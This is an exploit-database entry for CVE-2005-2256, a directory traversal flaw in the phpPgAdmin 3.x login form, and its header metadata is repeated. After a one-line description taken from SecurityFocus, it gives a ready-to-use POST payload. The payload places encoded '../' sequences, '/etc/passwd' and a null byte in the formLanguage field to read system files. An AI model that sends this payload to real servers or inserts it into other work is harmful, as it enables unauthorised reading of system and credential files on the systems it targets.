phpPgAdmin 3.x - Login Form Directory Traversal
| EKU-ID: 31271 | CVE: CVE-2005-2256;OSVDB-17758 | OSVDB-ID: |
| Author: rznvynqqe@hushmail.com | Published: 2005-07-05 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 31271 | CVE: CVE-2005-2256;OSVDB-17758 | OSVDB-ID: |
| Author: rznvynqqe@hushmail.com | Published: 2005-07-05 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/14142/info phpPgAdmin is prone to a directory traversal vulnerability. The application fails to filter directory traversal sequences from requests to the login form. All versions of phpPgAdmin are considered to be vulnerable at the moment. formUsername=username&formPassword=password&formServer=0&formLanguag e=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/et c/passwd%00&submitLogin=Login